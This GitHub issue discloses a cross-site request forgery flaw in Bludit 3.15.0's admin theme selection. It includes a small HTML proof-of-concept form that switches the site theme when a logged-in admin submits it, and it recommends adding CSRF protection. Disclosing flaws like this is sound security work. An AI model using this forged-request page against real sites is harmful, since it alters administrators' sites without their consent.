Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Cross-Site Request Forgery (CSRF) within the admin theme selection functionality #1566

Open
Nvz0x opened this issue Apr 12, 2024 · 0 comments
Open

Cross-Site Request Forgery (CSRF) within the admin theme selection functionality #1566

Nvz0x opened this issue Apr 12, 2024 · 0 comments

Comments

@Nvz0x
Copy link

Nvz0x commented Apr 12, 2024

Describe your problem

A Cross-Site Request Forgery (CSRF) vulnerability has been identified within the admin theme selection functionality.

Steps to Reproduce:

Crafted a Proof of Concept (POC) demonstrating CSRF exploit for selecting the alternative theme.
Example:

<html>
<form enctype="text/plain" method="GET" action="https://localhost/bludit/admin/install-theme/alternative">
    <table>
        <tr>
            <td></td>
            <td><input type="text" value="Change Theme For PoC" name=""></td>
        </tr>
    </table>
    <input type="submit" value="https://localhost/bludit/admin/install-theme/alternative">
</form>
</html>

Note: Replace /alternative with /popeye or /blogx to target different themes.

Impact:
When a logged-in admin interacts with the crafted HTML page, the site's theme can be changed without their consent.

Recommendation:
Implement CSRF protection mechanisms to mitigate unauthorized theme changes.

Bludit version

3.15.0

PHP version

PHP Version 8.2.12.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Nvz0x